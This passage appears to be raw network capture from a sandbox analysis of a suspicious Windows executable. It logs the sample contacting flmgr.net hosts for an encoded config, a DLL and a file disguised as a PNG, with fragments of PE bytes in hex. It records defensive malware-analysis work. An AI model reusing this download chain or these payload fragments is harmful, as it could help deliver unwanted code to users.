                                                                                      Data Ascii: uCGCj2HEWmqOwzDZJj4uPloszVoSZatGBEIQ2fyz/AFPNxgspiXp03LzFz3zWn7BQ+f2FS3ApZvHfSJBwHcPKt5BBrrUaqzX7u2xolOBbWcwNQ89UrN1GtOWTPUpZigqOoXkhImoTKXCvqkcBdHcMSyngoIg8s/18rON8+HlZr17NpIH17/+XHfezAxzqee9MyyLbdwKgA02aI5XFDkhmaVPfyW+dKpq/c6C7XjdinNRWkMn991VkzKB6nToU1E+WdxYD4nyaFlHhb1bsP0M/C4rLpcz5C9NvTC747SH45lVithyvtSUQ9PnOdGomsk7TqTE5SX8wgtZYaSu3+HtMxR7QSwqgTwXDz0RVTF1ZCe33Pz/isce90sk80+MBo9sb0TnoGpNKyTwwOWhQJos0aEerHJ7daKjof/DN1Y+ZJ8AEfpGWIfUoFRgsu89LluyC7vc9YSff2T3k7ndrfbms3bM2yfKJkml6Dj68xLQHP8HOYXSMAUwXU48uWKT1dLym+PHaM3TGtvOEG5TmFcWV4BKnqoirxjKBNFxrrieCBLS+sMZTcaYooel2GuiX6aYkzTgAecsksbZ4O6F5gpIBgo7XtGG3/VITT0lB3NKr5l9A1cMkOqt+FpohMNqLGoehEIqYHkzG7ct6b15t1cF8k6iK/z0IdptOZuO3IfVoSV6sIPABEIkXk9J1cvfh3EtivRMZqDJSC
                                                                                      Aug 4, 2023 18:49:02.677143097 CEST3471INData Raw: 37 4f 62 64 33 49 2f 38 44 63 6e 30 44 38 4e 6a 41 31 62 69 72 57 30 41 41 68 74 4c 37 34 48 6b 72 4a 46 76 4a 4f 73 70 59 69 64 6f 74 47 33 44 42 4e 33 30 72 6e 4d 73 30 51 44 68 79 6c 64 49 51 59 43 2f 63 6f 4a 51 36 66 63 72 64 4f 55 67 30 58
                                                                                      Data Ascii: 7Obd3I/8Dcn0D8NjA1birW0AAhtL74HkrJFvJOspYidotG3DBN30rnMs0QDhyldIQYC/coJQ6fcrdOUg0XBA==


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      16192.168.2.349734123.57.49.3680C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:49:06.301613092 CEST3473OUTPOST /v1/client/configs HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/4.0 (compatible; )
                                                                                      Host: api.flmgr.net
                                                                                      Content-Length: 0
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      Aug 4, 2023 18:49:06.616472960 CEST3474INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:49:06 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 800
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 75 43 47 43 6a 32 48 45 57 6d 71 4f 77 7a 44 5a 4a 6a 34 75 50 6c 6f 73 7a 56 6f 53 5a 61 74 47 42 45 49 51 32 66 79 7a 2f 41 46 50 4e 78 67 73 70 69 58 70 30 33 4c 7a 46 7a 33 7a 57 6e 37 42 51 2b 66 32 46 53 33 41 70 5a 76 48 66 53 4a 42 77 48 63 50 4b 74 35 42 42 72 72 55 61 71 7a 58 37 75 32 78 6f 6c 4f 42 62 57 63 77 4e 51 38 39 55 72 4e 31 47 74 4f 57 54 50 55 70 5a 69 67 71 4f 6f 58 6b 68 49 6d 6f 54 4b 58 43 76 71 6b 63 42 64 48 63 4d 53 79 6e 67 6f 49 67 38 73 2f 31 38 72 4f 4e 38 2b 48 6c 5a 72 31 37 4e 70 49 48 31 37 2f 2b 58 48 66 65 7a 41 78 7a 71 65 65 39 4d 79 79 4c 62 64 77 4b 67 41 30 32 61 49 35 58 46 44 6b 68 6d 61 56 50 66 79 57 2b 64 4b 70 71 2f 63 36 43 37 58 6a 64 69 6e 4e 52 57 6b 4d 6e 39 39 31 56 6b 7a 4b 42 36 6e 54 6f 55 31 45 2b 57 64 78 59 44 34 6e 79 61 46 6c 48 68 62 31 62 73 50 30 4d 2f 43 34 72 4c 70 63 7a 35 43 39 4e 76 54 43 37 34 37 53 48 34 35 6c 56 69 74 68 79 76 74 53 55 51 39 50 6e 4f 64 47 6f 6d 73 6b 37 54 71 54 45 35 53 58 38 77 67 74 5a 59 61 53 75 33 2b 48 74 4d 78 52 37 51 53 77 71 67 54 77 58 44 7a 30 52 56 54 46 31 5a 43 65 33 33 50 7a 2f 69 73 63 65 39 30 73 6b 38 30 2b 4d 42 6f 35 73 62 30 54 6e 6f 47 70 4e 4b 79 54 77 77 4f 57 68 51 4a 6f 73 30 61 45 65 72 48 4a 37 64 61 4b 6a 6f 66 2f 44 4e 31 59 2b 5a 4a 38 41 45 66 70 47 57 49 66 55 6f 46 52 67 73 75 38 39 4c 6c 75 79 43 37 76 63 39 59 53 66 66 32 54 33 6b 37 6e 64 72 66 62 6d 73 33 62 4d 32 79 66 4b 4a 6b 6d 6c 36 44 6a 36 38 78 4c 51 48 50 38 48 4f 59 58 53 4d 41 55 77 58 55 34 38 75 57 4b 54 31 64 4c 79 6d 2b 50 48 61 4d 33 54 47 74 76 4f 45 47 35 54 6d 46 63 57 56 34 42 4b 6e 71 6f 69 72 78 6a 4b 42 4e 46 78 72 72 69 65 43 42 4c 53 2b 73 4d 5a 54 63 61 59 6f 6f 65 6c 32 47 75 69 58 36 61 59 6b 7a 54 67 41 65 63 73 6b 73 62 5a 34 4f 36 46 35 67 70 49 42 67 6f 37 58 74 47 47 33 2f 56 49 54 54 30 6c 42 33 4e 4b 72 35 6c 39 41 31 63 4d 6b 4f 71 74 2b 46 70 6f 68 4d 4e 71 4c 47 6f 65 68 45 49 71 59 48 6b 7a 47 37 63 74 36 62 31 35 74 31 63 46 38 6b 36 69 4b 2f 7a 30 49 64 70 74 4f 5a 75 4f 33 49 66 56 6f 53 56 36 73 49 50 41 42 45 49 6b 58 6b 39 4a 31 63 76 66 68 33 45 74 69 76 52 4d 5a 71 44 4a 53 43
                                                                                      Data Ascii: uCGCj2HEWmqOwzDZJj4uPloszVoSZatGBEIQ2fyz/AFPNxgspiXp03LzFz3zWn7BQ+f2FS3ApZvHfSJBwHcPKt5BBrrUaqzX7u2xolOBbWcwNQ89UrN1GtOWTPUpZigqOoXkhImoTKXCvqkcBdHcMSyngoIg8s/18rON8+HlZr17NpIH17/+XHfezAxzqee9MyyLbdwKgA02aI5XFDkhmaVPfyW+dKpq/c6C7XjdinNRWkMn991VkzKB6nToU1E+WdxYD4nyaFlHhb1bsP0M/C4rLpcz5C9NvTC747SH45lVithyvtSUQ9PnOdGomsk7TqTE5SX8wgtZYaSu3+HtMxR7QSwqgTwXDz0RVTF1ZCe33Pz/isce90sk80+MBo5sb0TnoGpNKyTwwOWhQJos0aEerHJ7daKjof/DN1Y+ZJ8AEfpGWIfUoFRgsu89LluyC7vc9YSff2T3k7ndrfbms3bM2yfKJkml6Dj68xLQHP8HOYXSMAUwXU48uWKT1dLym+PHaM3TGtvOEG5TmFcWV4BKnqoirxjKBNFxrrieCBLS+sMZTcaYooel2GuiX6aYkzTgAecsksbZ4O6F5gpIBgo7XtGG3/VITT0lB3NKr5l9A1cMkOqt+FpohMNqLGoehEIqYHkzG7ct6b15t1cF8k6iK/z0IdptOZuO3IfVoSV6sIPABEIkXk9J1cvfh3EtivRMZqDJSC
                                                                                      Aug 4, 2023 18:49:06.616518021 CEST3474INData Raw: 37 4f 62 64 33 49 2f 38 44 63 6e 30 44 38 4e 6a 41 31 62 69 72 57 30 41 41 68 74 4c 37 34 48 6b 72 4a 46 76 4a 4f 73 70 59 69 64 6f 74 47 33 44 42 4e 33 30 72 6e 4d 73 30 51 44 68 79 6c 64 49 51 59 43 2f 63 6f 4a 51 36 66 63 72 64 4f 55 67 30 58
                                                                                      Data Ascii: 7Obd3I/8Dcn0D8NjA1birW0AAhtL74HkrJFvJOspYidotG3DBN30rnMs0QDhyldIQYC/coJQ6fcrdOUg0XBA==


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      17192.168.2.349736218.12.76.16180C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:49:25.299489975 CEST3475OUTGET /kit/KitTip.dll HTTP/1.1
                                                                                      Accept: */*
                                                                                      User-Agent: Mozilla/4.0 (compatible; )
                                                                                      Host: static.flmgr.net
                                                                                      Aug 4, 2023 18:49:25.460855007 CEST3477INData Raw: 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3a 80 08 00 00 10 00 00 00 82 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4c 54 01 00 00 a0 08 00 00 56 01 00 00 86 08 00 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: .text: `.rdataLTV@@.data\D@.tls @.rsrc "@@.reloc~v`x
                                                                                      Aug 4, 2023 18:49:25.460922956 CEST3478INData Raw: 24 14 8b 54 24 10 6a 00 51 8b 4c 24 14 52 8b 54 24 14 51 52 ff d0 5e c2 10 00 8b c6 5e c2 10 00 cc cc cc cc 81 ec 2c 01 00 00 a1 90 00 0a 10 33 c4 89 84 24 28 01 00 00 55 8b ac 24 34 01 00 00 56 57 33 ff ff 15 80 a2 08 10 8b f0 a1 dc 8d 0a 10 85
                                                                                      Data Ascii: $T$jQL$RT$QR^^,3$(U$4VW3u/hTthLRPjjL$QjV|T$$RjhltdhD$-jPD$4hL$,QjV|,D$,t$hPS
                                                                                      Aug 4, 2023 18:49:25.460990906 CEST3479INData Raw: 10 8b 15 6c 5d 0a 10 52 ff d3 a1 70 5d 0a 10 50 ff d3 8b 0d 6c 5d 0a 10 6a 00 51 ff d6 85 c0 74 0f 8b 15 70 5d 0a 10 6a 00 52 ff d6 85 c0 75 09 a1 74 5d 0a 10 85 c0 74 47 33 ff 8d 49 00 e8 9b fe ff ff 85 c0 75 44 47 83 ff 0c 7c f1 8b 0d 74 5d 0a
                                                                                      Data Ascii: l]Rp]Pl]jQtp]jRut]tG3IuDG|t]t_^3[l]Rp]P|h-Xh.X6WXSVW=t3Ih]\tp]<hFx|t]u\5T
                                                                                      Aug 4, 2023 18:49:25.461051941 CEST3481INHTTP/1.1 200 OK
                                                                                      Date: Fri, 04 Aug 2023 16:49:25 GMT
                                                                                      Content-Type: binary/octet-stream
                                                                                      Content-Length: 820128
                                                                                      Connection: keep-alive
                                                                                      Server: openresty
                                                                                      x-reserved: amazon, aws and amazon web services are trademarks or registered trademarks of Amazon Technologies, Inc
                                                                                      CloudServiceDiscount: CDN
                                                                                      x-amz-request-id: 0000018899BA0FEF84CB3FD9EF26105B
                                                                                      ETag: "5ed59ac24c1047a8b533c6c06ecbc40f"
                                                                                      Last-Modified: Fri, 19 Aug 2022 07:54:44 GMT
                                                                                      x-amz-id-2: 32AAAQAAEAABAAAQAAEAABAAAQAAEAABCS0Dy6yqoVg/8VeTVP6huttuSSPAd+Yn
                                                                                      via: CHN-HEshijiazhuang-AREACUCC1-CACHE35[5],CHN-HEshijiazhuang-AREACUCC1-CACHE49[0,TCP_HIT,4],CHN-TJ-GLOBAL1-CACHE18[7],CHN-TJ-GLOBAL1-CACHE104[0,TCP_HIT,3]
                                                                                      x-hcs-proxy-type: 1
                                                                                      X-CCDN-CacheTTL: 2592000
                                                                                      nginx-hit: 1
                                                                                      Age: 4961476
                                                                                      X-CCDN-Expires: 222525
                                                                                      Accept-Ranges: bytes
                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e7 b7 49 2f a3 d6 27 7c a3 d6 27 7c a3 d6 27 7c 1e 99 b1 7c ab d6 27 7c aa ae b2 7c bc d6 27 7c aa ae a4 7c af d7 27 7c aa ae a3 7c ff d6 27 7c 84 10 4a 7c a1 d6 27 7c a3 d6 26 7c 30 d7 27 7c 84 10 5c 7c 86 d6 27 7c aa ae ad 7c e2 d6 27 7c aa ae b5 7c a2 d6 27 7c bd 84 b3 7c a2 d6 27 7c aa ae b6 7c a2 d6 27 7c 52 69 63 68 a3 d6 27 7c 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 ad 33 fb 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 82 08 00 00 b2 03 00 00 00 00 00 63 1b 04 00 00 10 00 00 00 a0 08 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 0c 00 00 04 00 00 06 0b 0d 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 f3 09 00 5c 00 00 00 98 d2 09 00 7c 01 00 00 00 c0 0a 00 20 9d 01 00 00 00 00 00 00 00 00 00 98 3a 0c 00 08 49 00 00 00 60 0c 00 0c 58 00 00 90 a6 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 9e 09 00 18 00 00 00 70 9e 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$I/'|'|'||'||'||'||'|J|'|&|0'|\|'||'||'||'||'|Rich'|PEL3b!c@\| :I`Xp@
                                                                                      Aug 4, 2023 18:49:25.461144924 CEST3482INData Raw: 5e 01 8a 80 88 3d 0a 10 8a 9b 88 3d 0a 10 c0 e8 02 c0 e3 04 02 c3 88 41 01 8b 44 24 10 bb 03 00 00 00 2b d8 03 cb eb 3e 0f be 46 02 0f b6 80 88 3d 0a 10 0f be 5e 01 8a 9b 88 3d 0a 10 c0 e8 02 c0 e3 04 02 c3 88 41 01 0f be 46 02 0f b6 80 88 3d 0a
                                                                                      Data Ascii: ^==AD$+>F=^=AF=^=A;TD$L$D(tM)]_^[ 3D$=>>s>>QPVqtf>3jRL$L$VL$D$$
                                                                                      Aug 4, 2023 18:49:25.461206913 CEST3483INData Raw: 0f 00 00 00 89 5c 24 60 88 5c 24 50 3b f3 74 17 8d 50 01 8a 08 40 3a cb 75 f9 2b c2 50 56 8d 4c 24 54 e8 5b 15 00 00 57 8d 44 24 50 e8 11 fc ff ff 83 c4 04 3b f3 74 09 56 e8 e0 c6 03 00 83 c4 04 8d 45 04 50 ff 15 54 a1 08 10 85 c0 75 0b 8b 55 00
                                                                                      Data Ascii: \$`\$P;tP@:u+PVL$T[WD$P;tVEPTuUjhx]9|$drL$PQt$d\$`\$P9|$HrT$4RL$t$H\$D\$4;tP9$rD$lP$_^][3x
                                                                                      Aug 4, 2023 18:49:25.461272001 CEST3485INData Raw: 88 51 04 e8 be 07 00 00 5f c7 06 6c a7 08 10 8b c6 5e c2 04 00 cc 51 8b 4c 24 0c c6 04 24 00 8b 04 24 50 51 8b 4c 24 14 52 8b 54 24 14 e8 14 02 00 00 83 c4 10 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b f0 3b f7 74 13 6a ff 6a 00 53
                                                                                      Data Ascii: Q_l^QL$$$PQL$RT$V;tjjSm;u^QVD$D$L$T$PQRWS+$I++^YSUV+$I+,;t+jjV3
                                                                                      Aug 4, 2023 18:49:25.461340904 CEST3486INData Raw: 55 56 8b f0 8b 5e 10 57 8b 7e 0c 8b cb 2b cf b8 93 24 49 92 f7 e9 03 d1 c1 fa 04 8b c2 c1 e8 1f 03 c2 75 04 33 ff eb 35 3b fb 76 05 e8 85 c4 03 00 8b 4c 24 28 8b 06 85 c9 74 04 3b c8 74 05 e8 72 c4 03 00 8b 4c 24 2c 2b cf b8 93 24 49 92 f7 e9 03
                                                                                      Data Ascii: UV^W~+$Iu35;vL$(t;trL$,+$IL$,T$(D$$QRP9^;^v66\$u %3+<;xwt63;~sD$ x_^(][QUWtD$9Fw;
                                                                                      Aug 4, 2023 18:49:25.461399078 CEST3487INData Raw: a7 08 10 6a ff 89 41 14 c7 41 18 0f 00 00 00 50 88 41 04 8b 44 24 10 50 e8 a3 02 00 00 c7 06 6c a7 08 10 8b c6 5e c2 04 00 cc cc cc cc cc cc cc 56 33 c0 8b f1 6a ff 89 46 14 c7 46 18 0f 00 00 00 50 88 46 04 8b 44 24 10 50 e8 71 02 00 00 8b c6 5e
                                                                                      Data Ascii: jAAPAD$Pl^V3jFFPFD$Pq^VWr$;ustD9+u1v5By+u v$By+uvBI+_^_3^3$
                                                                                      Aug 4, 2023 18:49:25.461484909 CEST3489INData Raw: 36 00 10 c3 8b 7d ec 8b 75 08 8b 5d e8 8b 4d 0c 85 c9 76 20 83 7f 18 10 72 05 8b 47 04 eb 03 8d 47 04 51 50 8d 56 01 52 53 e8 b6 aa 03 00 83 c4 10 8b 4d 0c 83 7f 18 10 72 0f 8b 47 04 50 e8 21 a7 03 00 83 c4 04 8b 4d 0c 8d 47 04 c6 00 00 89 18 89
                                                                                      Data Ascii: 6}u]Mv rGGQPVRSMrGP!MGwOrMdY_^[]u~rNQFFFjjS\$VvF;sFPS3;^[|$tRsMW~;s
                                                                                      Aug 4, 2023 18:49:25.617419004 CEST3504INData Raw: 48 0c 83 ca ff f0 0f c1 11 4a 85 d2 7f 0a 8b 08 8b 11 50 8b 42 04 ff d0 8b 0f 83 79 f4 00 74 15 83 7c 24 20 00 75 05 e8 88 09 00 00 8b 74 24 1c e8 6f 16 00 00 5d 5f 5e b8 01 00 00 00 5b 59 c3 cc cc cc cc 83 ec 38 53 55 56 8b 74 24 4c 57 33 ff 3b
                                                                                      Data Ascii: HJPByt|$ ut$o]_^[Y8SUVt$LW3;u3Pff;u+D$LVD$TQD$\T$Q|$8|$<|$@|$DT$ f9>D$L@XuT$ L$\RSPu2;|$@rGt$8
                                                                                      Aug 4, 2023 18:49:25.622746944 CEST3507INHTTP/1.1 200 OK
                                                                                      Date: Fri, 04 Aug 2023 16:49:25 GMT
                                                                                      Content-Type: binary/octet-stream
                                                                                      Content-Length: 820128
                                                                                      Connection: keep-alive
                                                                                      Server: openresty
                                                                                      x-reserved: amazon, aws and amazon web services are trademarks or registered trademarks of Amazon Technologies, Inc
                                                                                      CloudServiceDiscount: CDN
                                                                                      x-amz-request-id: 0000018899BA0FEF84CB3FD9EF26105B
                                                                                      ETag: "5ed59ac24c1047a8b533c6c06ecbc40f"
                                                                                      Last-Modified: Fri, 19 Aug 2022 07:54:44 GMT
                                                                                      x-amz-id-2: 32AAAQAAEAABAAAQAAEAABAAAQAAEAABCS0Dy6yqoVg/8VeTVP6huttuSSPAd+Yn
                                                                                      via: CHN-HEshijiazhuang-AREACUCC1-CACHE35[5],CHN-HEshijiazhuang-AREACUCC1-CACHE49[0,TCP_HIT,4],CHN-TJ-GLOBAL1-CACHE18[7],CHN-TJ-GLOBAL1-CACHE104[0,TCP_HIT,3]
                                                                                      x-hcs-proxy-type: 1
                                                                                      X-CCDN-CacheTTL: 2592000
                                                                                      nginx-hit: 1
                                                                                      Age: 4961476
                                                                                      X-CCDN-Expires: 222525
                                                                                      Accept-Ranges: bytes
                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e7 b7 49 2f a3 d6 27 7c a3 d6 27 7c a3 d6 27 7c 1e 99 b1 7c ab d6 27 7c aa ae b2 7c bc d6 27 7c aa ae a4 7c af d7 27 7c aa ae a3 7c ff d6 27 7c 84 10 4a 7c a1 d6 27 7c a3 d6 26 7c 30 d7 27 7c 84 10 5c 7c 86 d6 27 7c aa ae ad 7c e2 d6 27 7c aa ae b5 7c a2 d6 27 7c bd 84 b3 7c a2 d6 27 7c aa ae b6 7c a2 d6 27 7c 52 69 63 68 a3 d6 27 7c 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 ad 33 fb 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 82 08 00 00 b2 03 00 00 00 00 00 63 1b 04 00 00 10 00 00 00 a0 08 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 0c 00 00 04 00 00 06 0b 0d 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 f3 09 00 5c 00 00 00 98 d2 09 00 7c 01 00 00 00 c0 0a 00 20 9d 01 00 00 00 00 00 00 00 00 00 98 3a 0c 00 08 49 00 00 00 60 0c 00 0c 58 00 00 90 a6 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 9e 09 00 18 00 00 00 70 9e 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$I/'|'|'||'||'||'||'|J|'|&|0'|\|'||'||'||'||'|Rich'|PEL3b!c@\| :I`Xp@


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      18192.168.2.349735218.12.76.16180C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:49:25.306792021 CEST3475OUTGET /green/1.2.32.1.png HTTP/1.1
                                                                                      Accept: */*
                                                                                      User-Agent: Mozilla/4.0 (compatible; )
                                                                                      Host: static.flmgr.net
                                                                                      Aug 4, 2023 18:49:25.476207972 CEST3490INData Raw: f4 67 a6 d4 5b 46 60 88 e8 aa 85 e8 ae e9 1a f9 fb 0d e1 09 64 b3 e3 a4 81 64 bc 78 93 cf fe f6 4c ef d6 1e 2b f0 92 78 18 81 fc 98 5f 0f 74 0f 9a 5e d6 b7 8a 8c 43 d3 35 f4 91 10 26 11 3b 49 20 e0 4f e6 33 0e c1 8a f7 21 ce 56 ac 06 32 43 de 3a
                                                                                      Data Ascii: g[F`ddxL+x_t^C5&;I O3!V2C:XeL&_SiFHZx-{f!r(6NOQrWIVQF1,cZ+J=%Z4q+s+s0sT#$
                                                                                      Aug 4, 2023 18:49:25.476279020 CEST3492INHTTP/1.1 200 OK
                                                                                      Date: Fri, 04 Aug 2023 16:49:25 GMT
                                                                                      Content-Type: image/png
                                                                                      Content-Length: 1281520
                                                                                      Connection: keep-alive
                                                                                      Server: openresty
                                                                                      x-reserved: amazon, aws and amazon web services are trademarks or registered trademarks of Amazon Technologies, Inc
                                                                                      CloudServiceDiscount: CDN
                                                                                      x-amz-request-id: 0000018953CC012485D1D133C5D36B6E
                                                                                      ETag: "709ffc69150cb0fa6f8e32b6ee62f41f"
                                                                                      Last-Modified: Fri, 14 Jul 2023 09:46:08 GMT
                                                                                      x-amz-tagging-count: 0
                                                                                      x-amz-id-2: 32AAAQAAEAABAAAQAAEAABAAAQAAEAABCS3fxc/C6tkBgpvVKbkU6es94XX63zbV
                                                                                      X-CCDN-Expires: 752635
                                                                                      via: CHN-HEshijiazhuang-AREACUCC1-CACHE39[3],CHN-HEshijiazhuang-AREACUCC1-CACHE40[0,TCP_HIT,2],CHN-TJ-GLOBAL1-CACHE117[2],CHN-TJ-GLOBAL1-CACHE66[0,TCP_HIT,0]
                                                                                      x-hcs-proxy-type: 1
                                                                                      X-CCDN-CacheTTL: 2592000
                                                                                      nginx-hit: 1
                                                                                      Age: 1839366
                                                                                      Accept-Ranges: bytes
                                                                                      Data Raw: 60 50 eb 51 a2 bd fd e5 8b 2e 1e 42 4b 65 6d c9 40 53 40 bb 72 66 18 a8 6e 17 c0 8c 3a 9e 23 21 cb c3 39 8a ff 08 b0 18 47 a1 65 7b 69 10 4f 83 6a 19 f4 df 34 a8 16 a1 7f fd c3 2b 49 75 70 f3 7f c2 ed 7a 69 68 d6 9c 7d b4 7f d1 14 8e a3 c2 2a 0e de 31 bc d6 c9 8b 7b b9 fe b2 97 1b 9c 01 ae 5c fa d3 db 22 d7 0c fb 75 df a1 51 b7 e3 57 d8 8c cb 71 ad de 5e b6 36 d4 da a3 6e e1 5d a6 95 42 00 b7 2f 72 c4 c9 71 5f 31 26 b6 09 a3 53 0e e0 e7 19 67 b6 c3 e1 f5 aa 9b 38 2b 4a 6f 85 6a f8 f6 78 b0 47 d0 98 4e 94 24 7a 65 8b 56 6d f5 a5 76 6b 6f 31 7b a7 9e fb 13 2a 0f 37 9d c1 3d 6a a4 d1 7a b0 b1 9b f7 f6 8e 3d a7 54 42 be 1d 66 c1 d7 ba c1 b0 0f 3b 07 ae 44 b6 3f e4 b0 ae a7 d8 47 92 e3 13 3d 66 96 ef 18 3d 33 78 d6 f1 76 ac d5 75 77 aa a4 2b c6 a7 cc ea 93 f6 d5 be 7d 63 1a 2f 96 3f 53 c4 f5 e5 d4 bf 95 69 d0 9a 4f 7a 5d 42 4e c6 81 de 3e cd c1 a0 93 96 ee 88 7c 40 5f 39 72 38 37 e2 20 35 f1 78 ba 07 dc 19 c7 0b 21 90 40 dc 68 e8 ef c1 5b 6a c4 54 65 52 c4 4f de c2 0a ed 39 e5 27 e1 b3 2c f6 c8 55 5b 39 fc b2 92 4b eb 95 87 c6 ac c4 d5 f8 58 25 2e 16 bc 66 bf e0 c9 07 37 a2 f0 ba e8 1c 69 bd 62 6c 01 37 c2 bc 44 6d cd cb dd ef bb 65 f7 9e a7 64 db c9 26 2f 69 4c 9a 34 25 23 3e 7d 39 03 b8 56 0d da 67 8c fc bd de f3 84 d7 5d f5 e9 9c ce 5b 8a 65 36 90 5f d4 6c 84 f4 fd d2 0d 9e 11 32 d5 c0 aa 47 c0 d4 bc 21 67 21 65 26 4f db 3a 79 66 e1 19 ce 7b 04 df 5f 49 f4 9e 63 5d ea 2d 8e 06 69 f8 95 0e f4
                                                                                      Data Ascii: `PQ.BKem@S@rfn:#!9Ge{iOj4+Iupzih}*1{\"uQWq^6n]B/rq_1&Sg8+JojxGN$zeVmvko1{*7=jz=TBf;D?G=f=3xvuw+}c/?SiOz]BN>|@_9r87 5x!@h[jTeRO9',U[9KX%.f7ibl7Dmed&/iL4%#>}9Vg][e6_l2G!g!e&O:yf{_Ic]-i
                                                                                      Aug 4, 2023 18:49:25.476351023 CEST3493INData Raw: bc 87 3a 71 57 51 62 0a 02 5a 7c 55 b7 b9 16 02 87 bf 71 a1 19 af 1d 9d 2e 97 d9 a6 ed 91 2b 42 d0 53 bd 54 f5 de 79 26 23 02 8a 7c cd 9b 68 10 a2 a0 ec 5b c3 58 30 c9 a1 b9 10 ec 74 cb 06 02 50 b7 65 62 9a 1c ae fa 02 f0 ad e5 c0 b6 cd 12 fc 50
                                                                                      Data Ascii: :qWQbZ|Uq.+BSTy&#|h[X0tPebPG":mU<\HJ}MNk0]~,XNBntt*:N;N1f.6YQ=|?;)+AR03Sn=>XopyIt;v=!pgFF@X
                                                                                      Aug 4, 2023 18:49:25.476414919 CEST3494INData Raw: ec e9 7a 78 1f 13 13 db 25 47 31 a8 16 21 cc 66 b2 6c d2 f9 b6 1a 60 3a 6c 74 f6 aa be 88 00 35 70 c1 7f 52 2d 74 85 41 82 1b c2 40 49 f0 ad 62 fe 3f ab 72 21 8e 84 65 d6 54 8c 4b 66 fc 90 3e 17 e1 cc f3 89 21 a8 fb 64 b5 e8 a5 ee eb 82 96 f5 36
                                                                                      Data Ascii: zx%G1!fl`:lt5pR-tA@Ib?r!eTKf>!d65'TfgFVDq{Kht'#.\h*Tg92Y\P|V+mm,ZY"y7k!E1nEYO(tIXS^<G{ev>lXJ{hr
                                                                                      Aug 4, 2023 18:49:25.476480007 CEST3496INData Raw: 41 b0 82 62 2a 64 99 6a d6 b3 5b a1 ee 2f e7 c2 b6 ef 69 51 1c e5 84 68 f8 32 dd d6 40 90 42 96 db 7e 75 0b 56 73 82 25 e1 78 3e ff cb 9f cb f0 0d 31 54 03 a7 ce 91 7b 9e 1f 4a 77 65 28 bd d9 a4 a7 b7 91 c2 88 06 9a 2c ee 50 e1 1e a1 f3 65 b0 ed
                                                                                      Data Ascii: Ab*dj[/iQh2@B~uVs%x>1T{Jwe(,Pe^dAf9quh*lyD:9bBO7<y}%T0UdyZ`DbfE5Bcl:g=22ma:2D"I^rpQJJ]/
